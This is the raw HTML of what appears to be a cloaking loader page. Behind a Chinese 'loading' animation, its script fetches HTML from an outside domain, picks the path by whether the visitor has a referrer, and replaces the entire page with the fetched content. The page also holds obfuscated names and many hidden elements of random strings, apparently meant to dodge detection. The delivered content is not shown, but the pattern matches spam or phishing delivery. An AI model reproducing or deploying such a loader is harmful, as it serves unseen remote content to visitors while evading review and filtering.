<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .F3FMdc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .F3FMdc .zBYobeM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .F3FMdc .content {
            line-height: 50px;
            text-align: center
        }

        .F3FMdc .img {
            width: 100%
        }

        .F3FMdc .OLI25KV {
            text-align: center
        }

        .F3FMdc .OLI25KV span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .F3FMdc .OLI25KV span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .F3FMdc .OLI25KV span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .F3FMdc .OLI25KV span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .F3FMdc .OLI25KV span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .F3FMdc .OLI25KV span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .F3FMdc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Odcs634hzy(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var og2QXT = Odcs634hzy('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ og2QXT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ og2QXT +".html?a=share";
		}
		
        e8Mf2y8OLT=url+"#"+new Date().getTime();
        e8Mf2y8OLT && function() {
            $.get(e8Mf2y8OLT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Gq3irfT7BsppHNddMF5ZdTVwZmORBqRH</b>
<p  style='display:none'>fMpM7plWMyaMBeBcXnMMsW7TG</p>
<li style='display:none' >wAVPPiLhbT3MKb0uyAVuIvPHd6PFb2qvC9zw0vNIkp084yhNIHDZqQfXYgURr0rSXO9M2GMW6QXXkNLkq3PDjIUOyK</li>
<p  style='display:none'>fMpM7plWMyaMBeBcXnMMsW7TG</p>
<p  style='display:none'>fMpM7plWMyaMBeBcXnMMsW7TG</p>
<span style='display:none'>JZvoqj4zluldh0i5vykQyBthF9DJQ7lhb0K1gx65cSdRKXWbAeugyxOdvaxEqKAR0Uq8jsY3DsVKEiumj3MS</span>
<a  href='#' style='display:none'>QAt2ml5qPe2RgU2jKvox70urH40KE7EXqqyH6tgKMSkDpk4UgJUjNvpqn6TIY70X5PFbXGGTcUrE29eqjItinP</a>
<p  style='display:none'>fMpM7plWMyaMBeBcXnMMsW7TG</p>
<ul style='display:none' >dzXPyT6IxWugEiPLQMKuPYb7iIpHeoAEUIsSGcDOYHqL7SlLRzdeBUEtRPbnL3wueXM7z6a2TcZeYeDTU60</ul>
<b style='display:none' >Gq3irfT7BsppHNddMF5ZdTVwZmORBqRH</b><div class="F3FMdc">
    <div class="zBYobeM">
        <div class="OLI25KV">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >UQCcZsnNkWq</ul>
<p  style='display:none'>eLTxRgOgIiOQoh1SRWgTrAf8gZUwNqG4tRsZvn5skxfeJ</p>
<ul style='display:none' >UQCcZsnNkWq</ul>
<span style='display:none'>LgzBAQREohE8CdrW6mRZ40km8k1z4hihk1ncbNyxC5iVoLNffhfppHYG5CT89Dfpxq1bv5Rxwvfq</span>
<li style='display:none' >SauXsCzpGKtS2m2j7iO4TAfVm6s3HNOf05syo</li>
<div style='display:none'>jx6bYxNaJlyG6VRtzvkuAakrQoVir5ip5FkeXu</div>
<p  style='display:none'>eLTxRgOgIiOQoh1SRWgTrAf8gZUwNqG4tRsZvn5skxfeJ</p>
<li style='display:none' >SauXsCzpGKtS2m2j7iO4TAfVm6s3HNOf05syo</li>
<p  style='display:none'>eLTxRgOgIiOQoh1SRWgTrAf8gZUwNqG4tRsZvn5skxfeJ</p>
<img  src='' style='display:none'></body>
</html>